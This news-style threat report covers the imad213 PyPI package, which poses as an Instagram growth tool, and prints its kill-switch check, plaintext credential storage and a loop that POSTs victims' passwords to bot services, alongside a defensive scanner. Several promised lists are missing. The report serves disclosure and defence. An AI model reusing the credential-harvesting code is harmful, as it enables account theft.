Recent research by cybersecurity experts has unveiled a sophisticated malware campaign masquerading as Instagram growth tools. These malicious packages, distributed primarily as Python packages on open-source repositories such as PyPI, lure users with promises of rapid follower increases and engagement boosts.
However, behind the innocent facade lies a credential harvesting operation with global reach. The malware, attributed to a threat actor known as “IMAD-213,” employs technical subterfuge such as remote kill switches and secret credential broadcasts to exploit Instagram users.
The malware, distributed under the name imad213, is cleverly packaged as a Python script. Its GitHub repository features a polished README and installation instructions, notably recommending “a temporary account for safety.”
This deceptive tip tricks users into believing they are taking a precaution, while in reality, they are encouraged to provide valid, albeit secondary, credentials.
Upon installation and execution, the script employs several mechanisms to ensure persistence and control:
1. Remote Kill Switch via Netlify
The script begins by establishing a remote connection to a control file hosted on Netlify:
```python
import requests

# ANSI colour codes used for the script's console output
GREEN = "\033[92m"
RED = "\033[91m"
RESET = "\033[0m"

def check_initial_request():
    # Fetch the attacker-controlled gate file; the script only proceeds
    # when the file contains the expected token
    url = "https://imad-213-imad21.netlify.app/pass.txt"
    try:
        response = requests.get(url)
        if response.status_code == 200:
            content = response.text.strip()
            if content == "imad213":
                print(f"{GREEN}INSTAGRAM-LOGIN{RESET}")
                return True
            else:
                print(f"{RED}IMAD-213{RESET}")
                return False
    except Exception:
        # Any network failure is treated as "do not run"
        return False
```
This check not only verifies the authenticity of the script but allows the attacker to shut down the malware operation globally by changing a single file. This remote kill switch is a powerful mechanism for avoiding detection and law enforcement intervention.
2. Local Credential Storage and Social Engineering
Once cleared through the kill switch, the script prompts users for Instagram credentials, storing them in plaintext on the victim’s machine:
```python
# Function to save account data in a file (the original comment is in Arabic)
def save_credentials(username, password):
    # Plaintext write to the current working directory
    with open("credentials.txt", "w") as file:
        file.write(f"{username}\n{password}")
    print("Credentials saved successfully.")
```
Local storage further convinces users of the script’s legitimacy, obscuring its nefarious intent.
3. Credential Broadcast and Bot Service Coordination
The true danger emerges when the script, unbeknownst to the user, submits the stolen credentials to a network of at least ten third-party Instagram bot services. The script sends the login information via POST requests to each bot service, each of which masquerades as a legitimate growth tool. These sites often display seemingly transparent disclaimers, but in reality they harvest the credentials for later abuse.
An example of the credential transmission code:
```python
import requests

# username and password were collected from the victim earlier in the script
login_data = {
    "username": username,  # Your actual Instagram username
    "password": password,  # Your actual Instagram password
    "userid": "",
    "antiForgeryToken": "5e65770c2420a986097445ab74b0e24b"
}
session = requests.Session()
# headers and bot_service_urls are defined earlier in the script (not shown
# in this excerpt); bot_service_urls contains all target URLs
for login_url in bot_service_urls:
    response = session.post(login_url, headers=headers, data=login_data)
```
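The three behaviours described in sections 1 to 3 (a remote gate file, plaintext credential storage, and a credential dict POSTed to many URLs in a loop) can be flagged statically before a package is installed. The following is an added example, not code from the report or from the malware: a small AST-based scanner run over a constructed sample that mirrors those patterns (the sample, its placeholder URL and the finding labels are all assumptions made here).

```python
import ast

# Constructed sample (not the real package) that mirrors the three behaviours
# the report describes: a remote text-file gate, plaintext credential storage,
# and a credential dict POSTed to many URLs in a loop.
SAMPLE_PACKAGE = '''
import requests

def check_initial_request():
    r = requests.get("https://example.invalid/pass.txt")  # placeholder URL
    return r.text.strip() == "token"

def save_credentials(username, password):
    with open("credentials.txt", "w") as f:
        f.write(username + "\\n" + password)

def broadcast(username, password, urls):
    data = {"username": username, "password": password}
    s = requests.Session()
    for u in urls:
        s.post(u, data=data)
'''

SECRET_KEYS = {"password", "passwd", "pwd", "token"}

def _call_name(node):
    """Bare callee name: 'requests.get' and 's.post' -> 'get' / 'post'."""
    f = node.func
    return f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")

def _dict_keys(d):
    return {k.value for k in d.keys if isinstance(k, ast.Constant)}

def scan_source(src):
    """Return sorted (lineno, finding) pairs for the behaviours above."""
    tree = ast.parse(src)
    # Names bound to dict literals that carry a credential-like key
    secret_dicts = {t.id for n in ast.walk(tree) if isinstance(n, ast.Assign)
                    and isinstance(n.value, ast.Dict) and _dict_keys(n.value) & SECRET_KEYS
                    for t in n.targets if isinstance(t, ast.Name)}
    # Calls that sit inside a loop body (fan-out of the same payload to many URLs)
    in_loop = {id(c) for n in ast.walk(tree) if isinstance(n, (ast.For, ast.While))
               for c in ast.walk(n) if isinstance(c, ast.Call)}
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        strs = [a.value for a in node.args if isinstance(a, ast.Constant) and isinstance(a.value, str)]
        if name == "get" and any(s.endswith(".txt") for s in strs):
            findings.append((node.lineno, "remote-gate"))
        if name == "open" and len(strs) >= 2 and "w" in strs[1] and any(w in strs[0].lower() for w in ("cred", "pass")):
            findings.append((node.lineno, "plaintext-credential-file"))
        if name == "post":
            payload = next((kw.value for kw in node.keywords if kw.arg in ("data", "json")), None)
            leaks = (isinstance(payload, ast.Name) and payload.id in secret_dicts) or \
                    (isinstance(payload, ast.Dict) and bool(_dict_keys(payload) & SECRET_KEYS))
            if leaks:
                findings.append((node.lineno, "credential-broadcast" if id(node) in in_loop else "credential-post"))
    return sorted(findings)
```

Run `scan_source` over each `.py` file in an unpacked wheel or sdist; any file that triggers all three findings together deserves manual review before the package reaches a developer machine.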
Among the targeted services are:
Analysis of WHOIS data and infrastructure reveals that these domains are operated from the same Turkish registrar, share Cloudflare protection, and were registered within days of each other, suggesting a coordinated attack campaign.
Instagram’s massive user base, exceeding 2 billion active users, makes it an attractive target for such scams.
The malware’s technical sophistication, including its use of legitimate hosting services for command and control, demonstrates a growing trend toward resilient and distributed attack infrastructure. Security analysts highlight several concerning developments:
Users who fall victim to these scams face immediate account compromise, potential illegal use of their personal data and, crucially, violations of Instagram’s Community Guidelines, which can result in permanent bans or shadowbanning.
Furthermore, password reuse across different services magnifies the risk, potentially leading to identity theft and broader cybercrime.
Cybersecurity teams recommend the following proactive measures:
Platforms like Socket AI Scanner provide automated risk detection for open-source packages, helping developers identify malicious behavior before it enters production environments.
The emergence of these credential-harvesting Instagram growth services underscores the ongoing arms race between cybercriminals and security professionals.
Attackers are leveraging legitimate infrastructure and social engineering to outmaneuver traditional defenses, making user vigilance and advanced security tools vital in protecting digital identities.
As threat actors continue to evolve their tactics, collaboration between security researchers, platform operators, and end users will be essential in mitigating these risks and safeguarding the integrity of online communities.